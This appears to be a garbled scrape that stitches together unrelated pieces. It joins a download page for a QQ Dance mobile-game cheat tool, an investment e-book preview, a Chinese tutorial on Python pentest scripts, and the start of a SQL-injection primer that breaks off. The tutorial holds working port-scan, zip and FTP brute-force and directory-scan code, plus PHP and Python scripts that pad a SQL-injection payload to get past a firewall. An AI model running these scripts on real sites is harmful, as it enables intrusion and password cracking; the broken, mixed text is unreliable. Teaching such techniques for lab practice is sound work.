0 3 8 0 7 0 . cò м#pdfgo 旋舞用挂必须关360吗?脚本也是吗?什么挂最安全啊?

游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具 2.8.1
打开手机版页面
版本说明软件地址2.7.0查看2.7.5查看1.0.5查看1.66查看2查看
腾讯经典音乐舞蹈类网游同IP手游《QQ炫舞手游》由端游原版人马倾力打造的,在产品的核心体验方面实现对端游精髓的继承,以及对核心品质的打磨,同时力求在画面、音乐、舞蹈、服饰上的精益求精,及对于用户痛点的解决。
QQ炫舞手游辅助工具,提供游戏挂机,自动、连刷、连P等功能,由&&为腾讯版《QQ炫舞》手游玩家打造全网最强辅助工具,解脱你的双手。
游戏蜂窝QQ炫舞手游辅助工具聚合了行业脚本作者,为你倾力打造最好用的《QQ炫舞》手游辅助工具脚本。
同时游戏蜂窝QQ炫舞手游辅助工具也是全网唯一免ROOT使用的手游辅助,经过强大的知名脚本的认证,支持绝大部分机型,也能完美支持安卓直接运行使用。
辅助使用说明:
1、自动挂机
2、自动按键
3、连刷连P
4、支持多种模式
辅助使用说明:
1、安装好【游戏蜂窝QQ炫舞手游辅助工具】,进入蜂窝界面;
2、注册并登蜂窝,进入【首页】或者点击【前往辅助库】,搜索&QQ炫舞手游&;
3、选择好某个作者制作的辅助;
4、点击右下角的【运行】,设置好弹出的辅助功能,点【保存】;
5、进入游戏后,点击悬浮窗的小蜂窝,并点击【启动】即可运行辅助。
相关合集:
相关热搜:
 腾讯推出的一款在线休闲游戏平台。可以使用QQ直接登陆QQ游戏,不用单独申请游戏帐号,与QQ好友一边聊天一边玩。集60款热门休闲游戏,包括多款真人视频棋牌游戏,特别开设照片秀专区房间,支持腾讯视频认证。收到很多玩家的喜爱,华军软件园为大家提供QQ游戏大全供大家下载,种类多、版本全,非常实用,希望能够帮助到喜爱玩的玩家,相信一定会为大家带来便利,赶紧来看看吧。...
联通下载地址
电信下载地址
移动及其他下载地址
(您的评论需要经过审核才能显示)
这个游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具好用不?求用过的朋友介绍下
好嘢啊,终于可以打白话啦
很好很强大
游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具这么好的软件你到哪里去找啊
可能用的少,总感觉游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具用起来不怎么上手,或许多用几天就好了?
很好,游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具2.8.1已安装并使用了,谢谢!
游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具2.8.1下载好慢,不知道是不是我网速问题,继续等待……
游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具这么好的软件你到哪里去找啊
问下大家这个游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具是否是官方提供的最新的2.8.1吗?
下载测试了,很好用的,很其他人口中介绍的游戏蜂窝QQ炫舞手游辅助自动连刷脚本工具一样
游戏辅助推荐
2.262.87765
2.262.87765
其他用户还推荐了的软件
手机软件最新更新
热门关键词您所在位置: &
&nbsp&&nbsp&nbsp&&nbsp
〈高清书籍〉投资7堂课-雪球.pdf 123页
本文档一共被下载:
次 ,您可全文免费在线阅读后下载本文档。
下载提示
1.本站不保证该用户上传的文档完整性,不预览、不比对内容而直接下载产生的反悔问题本站不予受理。
2.该文档所得收入(下载+内容+预览三)归上传者、原创者。
3.登录后可充值,立即自动返金币,充值渠道很便利
〈高清书籍〉投资7堂课-雪球
你可能关注的文档:
··········
··········
雪球专刊·042期
雪球专刊·042期——投资7堂课
出品人:方三文
策划:刘江涛 于达
封面设计:雷雨晴
制作:嵇晓栋
本书由雪球(北京)技术开发有限公司授权亚马逊
Kindle全球范围内电子版制作与发行
版权所有·侵权必究
雪球(http://xueqiu.com)是目前国内最专业的
投资社交网络,致力于为投资者提供跨市场、跨品种
的数据查询、新闻订阅和互动交流服务,目前已覆盖A
股、港股和美股市场。
知识产权:
此电子周刊中内容版权由对应的用户和雪球共同所
有。第三方若出于非商业目的,此电子专刊的内容转
载,应当在作品正文开头显著位置,注明原作者和来
源于雪球。
若需要对作品用于商业目的,第三方需要获得原作
者和雪球的单独授权,并按照原作者规定的方式使用
该内容。转载授权等相关事宜,请发邮件到
本刊部分图片和文字来源于网络,如有侵权,请和
我们联系。
?浙江出版集团数字传媒有限公司 2014
DNA-BN:ECFD-N40725
最后修订:日
出版:浙江出版集团数字传媒有限公司
浙江 杭州 体育场路347号
互联网出版许可证:新出网证(浙)字10号
电子邮箱:
网  址:www.bookdna.cn
浙江出版集团数字传媒有限公司为作者提供电子书出
本书电子版如有错讹,祈识者指正,以便新版修订。
?Zhejiang Publishing United Group Digital
Media CO.,LTD,2014
No.347 Tiyuchang Road, Hangzhou 310006 P.R.C.
www.bookdna.cn
屌丝的逆袭&透明的底牌
如何更好地利用卖方研究服务?
站在风口,如何寻找10倍股?
从投资科技股到投资未来
散户投资者如何战胜市场?
构筑股市中的进攻体系
笨人也能赚钱的4种方法
屌丝的逆袭&透明的底牌
陈宇,神农投资总经理,发表时间:,
原文链接:http://xueqiu.com//
说明:本文为神农投资总经理陈宇先生在第
十届北京国际金融博览会雪球论坛演讲全文,
已经陈总审阅。
雪球财经的各位同事,在座的各位球友,大家
好。非常高兴可以跟大家分享。了解我的朋友大家
知道我有两个工作履历,以前是在0024招商地产
任董事会秘书,一直到2007年,之后在重阳投
资;回京以后创立了神农投资,一直从事基金管理
今天这个场合讲什么,我特别考虑了一下。我
想还是给大家讲故事。我今天的打扮,大家看出来
了,就是专门来讲故事的。讲三个故事给大家。
第一个故事很应景,可以说是我接触的,也是
直接参与资本运作的第一个上市公司的故事。在
2001年11月,我成为了招商地产的董事会秘书。
那个时候的股市市场气氛和今天还颇为相似,其核
心特征就是庄股横行。我赶巧在庄股横行的尾声的
时候出任了这家公司的董秘。
当时的招商地产有一个非常屌丝的名字,叫做
蛇口控股股份有限公司。我在12月份担任的董秘。
这张图片是非常美的,0024已经屌丝逆袭,摇
身一变为招宝万金,著名的房地产上市公司。这张
图片是现在蛇口的太资广场。经过十三年以后,这
家上市公司也成功逆袭了。
我当董秘的时候,就是这个图形开始的那一
天。在102块钱那一个月,我辞职了。我们今天讲
的故事就是围绕着公司从底下一直上去的过程。
我们看一下上市公司的公告。在2001年,这家
上市公司的总股本只有4亿7,A股的总市值只有33
亿。我去的时候,我当董秘,拿到股东名册一看只
有三家公募基金,现在都不太知名了,当时只拿了
100多万股,其他的股东名册上全是散户。当时股
价是11块钱,我去了以后就发行可转债。最近招商
地产又发布公告,要发布一次80亿的可转债,我预
祝它成功。
很不幸,2002年,转债发行失败;2003年,
可转债转配股。因为2002年的市场太差了。2003
年,我们已经决定要加强上市公司的投资者关系。
将来上市公司是要融资的,是需要钱的。要想融资
怎么办呢?就必须有群众基础。要做好群众基础,
就要做好投资者关系。在7月份,我们举办了国内
上市公司的首家分析师年会。同年,2003年,大
股东也增持了17%的股权。
从公告可以看到,公司陆续在深圳、上海、北
京和蛇口以外的深圳区域参与拍卖土地,并开始资
产运作,开始置出资产,出售了招商石化的股权。
这一年,我们的股价并没有什么变化。过了两年,
还是11块钱,股票的市值也没有变化,还是36
亿。在这个时候,博时、安信、安顺已经开
正在加载中,请稍后...&figure&&img src=&https://pic3.zhimg.com/v2-8b6e70fb9bb0f_b.jpg& data-rawwidth=&697& data-rawheight=&443& class=&origin_image zh-lightbox-thumb& width=&697& data-original=&https://pic3.zhimg.com/v2-8b6e70fb9bb0f_r.jpg&&&/figure&&blockquote&作者:&a href=&https://link.zhihu.com/?target=https%3A//bbs.ichunqiu.com/thread-.html%3Ffrom%3Dzh& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&xiaoye&/a&&br&来源:&a href=&https://link.zhihu.com/?target=https%3A//bbs.ichunqiu.com/thread-.html%3Ffrom%3Dzh& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&i春秋社区&/a&&/blockquote&&p&&b&前言&/b&&/p&&p&python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在&a href=&https://link.zhihu.com/?target=http%3A//bbs.ichunqiu.com/portal.php%3Ffrom%3Dzh& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&渗透测试&/a&中的应用,让我们自己动手打造自己的&a href=&https://link.zhihu.com/?target=http%3A//bbs.ichunqiu.com/portal.php%3Ffrom%3Dzh& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&渗透工具&/a&集。&/p&&p&&br&&/p&&p&&b&一、信息搜集--py端口扫描小脚本&/b&&/p&&p&端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本。&/p&&p&端口扫描小脚本:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#coding: utf-8
import socket
import time
def scan(ip, port):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((ip, port))
return True
def scanport():
print '作者:xiaoye'.decode('utf-8').encode('gbk')
print '--------------'
print 'blog: [url]http://blog.163.com/sy_butian/blog'[/url]
print '--------------'
ym = raw_input('请输入域名(只对未使用cdn的网站有效):'.decode('utf-8').encode('gbk'))
ips = socket.gethostbyname(ym)
print 'ip: %s' % ips
portlist = [80,81,,23,443,69,22,25,110,89,00,1433]
starttime = time.time()
for port in portlist:
res = scan(ips, port)
print 'this port:%s is on' % port
endtime = time.time()
print '本次扫描用了:%s秒'.decode('utf-8').encode('gbk') % (endtime-starttime)
if __name__ == '__main__':
scanport()
#coding: utf-8
import socket
import time
def scan(ip, port):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((ip, port))
return True
def scanport():
print '作者:xiaoye'.decode('utf-8').encode('gbk')
print '--------------'
print 'blog: [url]http://blog.163.com/sy_butian/blog'[/url]
print '--------------'
ym = raw_input('请输入域名(只对未使用cdn的网站有效):'.decode('utf-8').encode('gbk'))
ips = socket.gethostbyname(ym)
print 'ip: %s' % ips
portlist = [80,81,,23,443,69,22,25,110,89,00,1433]
starttime = time.time()
for port in portlist:
res = scan(ips, port)
print 'this port:%s is on' % port
endtime = time.time()
print '本次扫描用了:%s秒'.decode('utf-8').encode('gbk') % (endtime-starttime)
if __name__ == '__main__':
scanport()
&/code&&/pre&&/div&&p&对于端口扫描技术,其实分很多种,通常是利用tcp协议的三次握手过程(从网上偷张图。。)&/p&&figure&&img src=&https://pic2.zhimg.com/v2-d05ae0db91da27753fadaf_b.jpg& data-caption=&& data-rawwidth=&627& data-rawheight=&340& class=&origin_image zh-lightbox-thumb& width=&627& data-original=&https://pic2.zhimg.com/v2-d05ae0db91da27753fadaf_r.jpg&&&/figure&&p&放出的那个脚本,是利用了tcp connect() 即完成了tcp三次握手全连接,根据握手情况判断端口是否开放,这种方式比较准确,但是会在服务器留下大量连接痕迹。&/p&&p&当然,如果不想留下大量痕迹,我们可以在第三次握手过程,将ack确认号变成rst(释放连接),连接没有建立,自然不会有痕迹,但是这种方法需要root权限
&/p&&p&好了,先讲解一下我们的py端口扫描小脚本:&/p&&p&核心代码:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&portlist = [80,81,,23,443,69,22,25,110,89,00,1433]
for port in portlist:
res = scan(ips, port)
print 'this port:%s is on' % port
&/code&&/pre&&/div&&p&这段代码是定义了要扫描的端口,并且用for ..in .. 来进行遍历&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((ip, port))
&/code&&/pre&&/div&&p&这段代码,是利用了socket套接字,建立tcp连接,socket.socket()就是s = socket.socket(socket.AF_INET, socket.SOCK_STREAM),用于tcp连接建立&/p&&p&&br&&/p&&p&&b&二、实用爆破小脚本--压缩文件密码爆破&&ftp爆破&/b&&/p&&p&对于压缩文件,py有自己的处理模块zipfile,关于zipfile的实例用法,在violent python里有实例脚本,模仿书里写了个小脚本&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#coding: utf-8
z = zipfile.ZipFile('') , extractall
z.extractall(pwd)
import zipfile
import threading
def zipbp(zfile, pwd):
zfile.extractall(pwd=pwd)
print 'password found : %s' % pwd
def main():
zfile = zipfile.ZipFile('xx.zip')
pwdall = open('dict.txt')
for pwda in pwdall.readlines():
pwd = pwda.strip('\n')
t = threading.Thread(target=zipbp, args=(zfile, pwd))
if __name__ == '__main__':
&/code&&/pre&&/div&&p&其实脚本很简单,核心就一个地方:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&zfile = zipfile.ZipFile('xx.zip')
..............
zfile.extractall(pwd=pwd)
&/code&&/pre&&/div&&p&ZipFile是zipfile模块重要的一个类,zfile就是类的实例,而extractall(pwd)就是类里的方法,用于处理带有密码的压缩文件;当pwd正确时,压缩文件就打开成功。而此脚本就是利用了zipfile模块的类和方法,加载字典不断尝试pwd,直至返回正确的密码,爆破成功&/p&&p&python在爆破方面也很有优势,比如ftp,py也有ftplib模块来处理,一次ftp连接过程如下:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&ftp = ftplib.FTP()
ftp.connect(host, 21, 9)
ftp.login(user, pwd)
ftp.retrlines('LIST')
ftp.quit()
&/code&&/pre&&/div&&p&connect(ip, port, timeout)用于建立ftp连接;login(user,pwd)用于登陆ftp;retrlines()用于控制在服务器执行命令的结果的传输模式;quit()方法用于关闭ftp连接&/p&&p&&br&&/p&&p&是不是觉得和zipfile的套路很像?没错,你会写一个,就会写另外一个,就会写许许多多的爆破脚本,脚本我就不放出来了,大家自己动手去写一写(p.s:关于ftp爆破,在加载字典之前,请先尝试空密码,即ftp.login(),万一成功了呢。。)&/p&&p&&br&&/p&&p&&b&三、目录探测--py低配版御剑&/b&&/p&&p&昨天写了个小脚本,用来探测目录,实现和御剑一样的效果,脚本是写好了,开了多线程,但是还算很慢。。之后我会再次修改:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#coding: utf-8
import sys
import requests
import threading
def savetxt(url):
with open('domain.txt', 'a') as f:
url = url + '\n'
f.write(url)
def geturl(url):
r = requests.get(url, timeout=1)
status_code = r.status_code
if status_code == 200:
print url + ' 200 ok'
savetxt(url)
#print url
#print status_code
syslen = len(sys.argv)
#print syslen
url = raw_input('请输入要扫描目录的网站\n'.decode('utf-8').encode('gbk'))
for i in range(1,syslen):
with open(sys.argv[i], 'r') as f:
for fi in f.readlines():
fi = fi.strip('\n')
fi = url + '/' + fi
t = threading.Thread(target=geturl, args=(fi,))
#res = ''.join(res)
#print res
&/code&&/pre&&/div&&figure&&img src=&https://pic3.zhimg.com/v2-463dc4c850eb1ca9b0138_b.jpg& data-caption=&& data-rawwidth=&741& data-rawheight=&167& class=&origin_image zh-lightbox-thumb& width=&741& data-original=&https://pic3.zhimg.com/v2-463dc4c850eb1ca9b0138_r.jpg&&&/figure&&p&能run起来,速度较慢。。&/p&&p&说一下主要思想吧,之后我改完再细讲。。:&/p&&p&加载1个或者多个字典,将字典中的内容与输入的url进行拼接得到完整url;&/p&&p&关于加载多个字典,代码实现如下:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&syslen = len(sys.argv)
#print syslen
url = raw_input('请输入要扫描目录的网站\n'.decode('utf-8').encode('gbk'))
for i in range(1,syslen):
with open(sys.argv[i], 'r') as f:
for fi in f.readlines():
fi = fi.strip('\n')
fi = url + '/' + fi
&/code&&/pre&&/div&&p&利用sys.argv,我们输入python yujian.py dir.txt就加载dir.txt,输入dir.txt php.txt ,因为有for i in range(1,syslen):,syslen=3,range(1,3)返回[1,2];&/p&&p&with open(sys.argv&i&, 'r') as f:&/i&它就会自动加载输入的两个txt文件(sys.argv[1]、sys.argv[2]);也就是说,我们输入几个文件,它就加载几个文件作为字典&/p&&p&当我们遇到php站点时,完全可以把御剑的字典拿过来,只加载php.txt dir.txt,这点和御剑是一样的:&/p&&figure&&img src=&https://pic2.zhimg.com/v2-8f2acb4072eab532a3abea_b.jpg& data-caption=&& data-rawwidth=&924& data-rawheight=&664& class=&origin_image zh-lightbox-thumb& width=&924& data-original=&https://pic2.zhimg.com/v2-8f2acb4072eab532a3abea_r.jpg&&&/figure&&p&通过python的requests.get(url)的状态返回码status_code来对是否存在该url进行判断;&/p&&p&如果返回200就将该url打印出来,并且存进txt文本里&/p&&p&目前是这么个想法。。&/p&&p&-----------------------------------------------------------------------&/p&&p&更新:多线程加队列目录探测脚本 : &a href=&https://link.zhihu.com/?target=https%3A//bbs.ichunqiu.com/thread-.html%3Ffrom%3Dzh& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&https://github.com/xiaoyecent/scan_dir&/a&&/p&&p&&br&&/p&&p&有关于更多小脚本, 可以访问 &a href=&https://link.zhihu.com/?target=http%3A//bbs.ichunqiu.com/portal.php%3Ffrom%3Dzh& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&https://github.com/xiaoyecent&/a& 目前添加了百度url采集、代理ip采集验证、爬虫、简单探测网段存活主机等小脚本,新手单纯交流学习,大牛勿喷&/p&&p&&b&四、爬虫爬取整站连接&/b&&/p&&p&这个爬虫是慕课网上的蚂蚁老师讲的,感觉做的非常好,就改了一下,本来是用来爬取百度百科python1000条词条的(现在还是能爬的,要是之后目标更新了,就得制订新的爬虫策略了,大的框架不需要变),改成了爬取网站整站连接,扩展性还是很好的。&/p&&p&爬虫的基本构成,抓一张蚂蚁老师的图:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-7d00eb2cbe8bf8bd62b267a_b.jpg& data-caption=&& data-rawwidth=&1344& data-rawheight=&765& class=&origin_image zh-lightbox-thumb& width=&1344& data-original=&https://pic1.zhimg.com/v2-7d00eb2cbe8bf8bd62b267a_r.jpg&&&/figure&&p&1.调度器:调度器用来对各个部分进行调度,如将url取出,送给下载器下载,将下载是页面送给解析器解析,解析出新的url及想要的数据等&/p&&p&2.url管理器:url管理器要维护两个set()(为啥用set(),因为set()自带去重功能),一个标识已抓取的url,一个标识待抓取的url,同时,url管理器还要有将解析器解析出来的新url放到待抓取的url里的方法等&/p&&p&3.下载器:实现最简单,抓取静态页面只需要r = &br&requests.get,然后r.content,页面内容就存进内存了,当然,你存进数据库里也是可以的;但是同时也是扩展时的重点,比如某些页面需要登陆才能访问,这时候就得post传输账号密码或者加上已经登陆产生的cookie&/p&&p&4.解析器:BeautifulSoup或者正则或者采用binghe牛的pyquery来解析下载器下载来的页面数据&/p&&p&5.输出器:主要功能输出想得到的数据&/p&&p&&b&调度器:&/b&&/p&&p&spider_main.py&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
from spider import url_manager, html_downloader, html_outputer, html_parser
class SpiderMain(object):
def __init__(self):
self.urls = url_manager.UrlManager()
self.downloader = html_downloader.HtmlDownloader()
self.parser = html_parser.HtmlParser()
self.outputer = html_outputer.HtmlOutputer()
def craw(self, root_url):
self.urls.add_new_url(root_url)
while self.urls.has_new_url():
new_url = self.urls.get_new_url()
print 'craw : %s' % new_url
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
print 'craw failed'
self.outputer.output_html()
if __name__ == &__main__&:
root_url = &自己想爬的网站,我爬了下爱编程,效果还行&
obj_spider = SpiderMain()
obj_spider.craw(root_url)
&/code&&/pre&&/div&&p&其中__init__是初始化,url_manager, html_downloader, html_outputer, html_parser是自己写的模块,各个模块里有各自的类和方法,通过初始化得到相应类的实例;&/p&&p&craw是调度器对各个模块的调度:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&new_url = self.urls.get_new_url()
print 'craw : %s' % new_url
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
&/code&&/pre&&/div&&p&分别对应着:&/p&&p&1.从待爬取url列表中取出一个url&/p&&p&2.将改url送往下载器下载,返回页面内容&/p&&p&3.将页面送往解析器解析,解析出新的url列表和想要的数据&/p&&p&4.调度url管理器,将新的url添加进带爬取的url列表&/p&&p&5.调度输出器输出数据&/p&&p&&br&&/p&&p&&b&url管理器:&/b&&/p&&p&url_manager.py:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class UrlManager(object):
def __init__(self):
self.new_urls = set()
self.old_urls = set()
def add_new_url(self, url):
if url is None:
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
def add_new_urls(self, urls):
if urls is None or len(urls) == 0:
for url in urls:
self.add_new_url(url)
def has_new_url(self):
return len(self.new_urls) != 0
def get_new_url(self):
new_url = self.new_urls.pop()
self.old_urls.add(new_url)
return new_url
&/code&&/pre&&/div&&p&url_manager模块里的类,及类的方法&/p&&p&&br&&/p&&p&&b&下载器:&/b&&/p&&p&html_downloader.py&/p&&p&本来蚂蚁老师用的urllib,我给改了,改成requests:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import urllib2
import requests
class HtmlDownloader(object):
def download(self, url):
if url is None:
return None
r = requests.get(url,timeout=3)
if r.status_code != 200:
return None
return r.content
&/code&&/pre&&/div&&p&&b&html解析器:&/b&&/p&&p&html_parser.py&/p&&p&把抓取策略给改了,现在是解析所有链接,即a标签href的值&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import urlparse
from bs4 import BeautifulSoup
class HtmlParser(object):
def parse(self, page_url, html_cont):
if page_url is None or html_cont is None:
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
new_urls = self._get_new_urls(page_url, soup)
new_data = self._get_new_data(page_url, soup)
return new_urls, new_data
def _get_new_urls(self, page_url, soup):
new_urls = set()
links = soup.find_all('a')
for link in links:
new_url = link['href']
new_full_url = urlparse.urljoin(page_url, new_url)
new_urls.add(new_full_url)
return new_urls
def _get_new_data(self, page_url, soup):
res_data = {}
return res_data
&/code&&/pre&&/div&&p&html_outputer.py&/p&&p&这个看情况,可要可不要,反正已经能打印出来了:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class HtmlOutputer(object):
def __init__(self):
self.datas = []
def collect_data(self, data):
if data is None:
self.datas.append(data)
def output_html(self):
fout = open('output.html', 'w')
fout.write(&&html&&)
fout.write(&&body&&)
fout.write(&&table&&)
for data in self.datas:
fout.write(&&tr&&)
fout.write(&&td&%s&/td&& % data['url'])
#fout.write(&&td&%s&/td&& % data['title'].encode('utf-8'))
#fout.write(&&td&%s&/td&& % data['summary'].encode('utf-8'))
fout.write(&&/tr&&)
fout.write(&&/table&&)
fout.write(&&/body&&)
fout.write(&&/html&&)
fout.close()
&/code&&/pre&&/div&&p&运行效果:&/p&&figure&&img src=&https://pic4.zhimg.com/v2-b745f9ee2b628a34be1f3e369ca419c9_b.jpg& data-caption=&& data-rawwidth=&1915& data-rawheight=&1029& class=&origin_image zh-lightbox-thumb& width=&1915& data-original=&https://pic4.zhimg.com/v2-b745f9ee2b628a34be1f3e369ca419c9_r.jpg&&&/figure&&p&这款爬虫可扩展性挺好,之后大家可以扩展爬取自己想要的内容&/p&&p&&br&&/p&&p&当然要是只需要爬取某个页面的某些内容,完全不必要这么麻烦,一个小脚本就好了:&/p&&p&比如我要爬取某二级域名接口中的二级域名结果:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#coding: utf-8
import urllib, re
def getall(url):
page = urllib.urlopen(url).read()
return page
def ressubd(all):
a = re.compile(r'value=&(.*?.com|.*?.cn|.*?.com.cn|.*?.org| )&&&input')
subdomains = re.findall(a, all)
return (subdomains)
if __name__ == '__main__':
print '作者:深夜'.decode('utf-8').encode('gbk')
print '--------------'
print 'blog: [url]http://blog.163.com/sy_butian/blog'[/url]
print '--------------'
url = 'http://i.links.cn/subdomain/' + raw_input('请输入主域名:'.decode('utf-8').encode('gbk')) + '.html'
all = getall(url)
subd = ressubd(all)
sub = ''.join(subd)
s = sub.replace('http://', '\n')
with open('url.txt', 'w') as f:
f.writelines(s)
&/code&&/pre&&/div&&p&小脚本用正则就好了,写的快&/p&&p&&br&&/p&&p&&b&五、python在exp中的应用&/b&&/p&&p&之前海盗表哥写过过狗的一个php fuzz脚本&/p&&p&&a href=&https://link.zhihu.com/?target=http%3A//bbs.ichunqiu.com/forum.php%3Fmod%3Dviewthread%26tid%3D16134& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&bbs.ichunqiu.com/forum.&/span&&span class=&invisible&&php?mod=viewthread&tid=16134&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&表哥写的php版本的:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&&?php $i=10000;
$url = 'http://192.168.1.121/sqlin.php'; for(;;){
echo &$i\n&;
$payload = 'id=-1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) and 1='.str_repeat('3',$i); $ret = doPost($url,$payload);
if(!strpos($ret,'网站防火墙')){
echo &done!\n&.strlen($payload).&\n&.$ die();
function doPost($url,$data=''){ $ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_HEADER, 0 ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); $return = curl_exec ($ch);
curl_close ($ch); return $
&/code&&/pre&&/div&&p&我在本地搭了个环境,然后用python也写了下,还是挺好写的:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&#coding: utf-8
import requests, os
#i = 9990;
url = 'http://localhost:8090/sqlin.php'
def dopost(url, data=''):
r = requests.post(url, data)
return r.content
for i in range():
payload = {'id':'1 and 1=' + i * '3' + ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))'}
#print payload
ret = dopost(url, payload)
ret = ''.join(ret)
if ret.find('网站防火墙') == -1:
print &done\n& + &\n& + ret
&/code&&/pre&&/div&&p&&b&六、总结&/b&&/p&&p&学生党还是很苦逼的,1.15号才考完试,不说了,写文章写了俩小时。。我去复习了,各位表哥有意见或者建议尽管提,文章哪里不对的话会改的,欢迎表哥表弟们来&a href=&https://link.zhihu.com/?target=https%3A//bbs.ichunqiu.com/thread-.html%3Ffrom%3Dzh& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&社区&/a&一起交流哦~ &/p&
作者: 来源:前言python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在中的应用,让我们自己动手打造自己的集。 一、信息搜集--py端口扫描小脚本端口扫描是渗透测试中常用的技术手…
&figure&&img src=&https://pic1.zhimg.com/v2-dceb6c365ef_b.jpg& data-rawwidth=&903& data-rawheight=&308& class=&origin_image zh-lightbox-thumb& width=&903& data-original=&https://pic1.zhimg.com/v2-dceb6c365ef_r.jpg&&&/figure&&p&作者:
226safe Team 最菜的那位!&/p&&p&反正我问他杂写的,他就是这么说的。由于团队在知乎没专栏,我就只能转贴到我的笔记上来了,分享给大家,常见的漏洞汇总吧,很不错。(*^__^*) 嘻嘻……&/p&&p&----------------------------------------------------------------------------------------------------------------------&/p&&h2&SQL注入&/h2&&p&&b&成因&/b&:程序未对用户的输入的内容进行过滤,从而直接代入数据库查询,所以导致了sql 注入&/p&&p&漏洞 。&/p&&p&&b&思路:&/b&在URL处可以通过 &b&单引号&/b& 和 &b&and 1=1&/b&
&b&and 1=2&/b& 等语句进行手工测试sql注入 。&/p&&p&&b&Post&/b&&b& 注入:&/b&比如后台登录框输入单引号测试注入,报错的话说明存在注入可以直接抓包,用工具来完成注入。( 在HTML中关于提交类型代码,尤其是后台登录和留言这些,都是需要 post 形式来提交的,而且 post 提交方式也是不会像 get 形式在 URL 中显示的。)&/p&&p&关于SQL注入 还有 ,Cookie注入 盲注 爆错注入 等等...&/p&&p&&b&实例:&/b&&/p&&figure&&img src=&https://pic3.zhimg.com/v2-67ecb739a5b3a199ae6d481_b.jpg& data-rawwidth=&723& data-rawheight=&99& class=&origin_image zh-lightbox-thumb& width=&723& data-original=&https://pic3.zhimg.com/v2-67ecb739a5b3a199ae6d481_r.jpg&&&/figure&&p&输入单引号,进行初步判断,如果报错就说明可能存在注入。 &br&&/p&&p&然后我,猜想出真正执行的SQL语句应该是: select * from info where fid=623&/p&&p&继续输入 and 1=1 , and 1=2 来看下是否可以手工注入,就是查看页面是否存在显示性错误,而不是单引号式的错误。&/p&&p&由于我是转贴的,所以就没有这个截图,但是成功的报错了。而 and 1=1 和 and 1=2 在SQL 语句中是这样的:&/p&&p&select * from news where id=623
and 1=1&/p&&p&select * from news where id=623
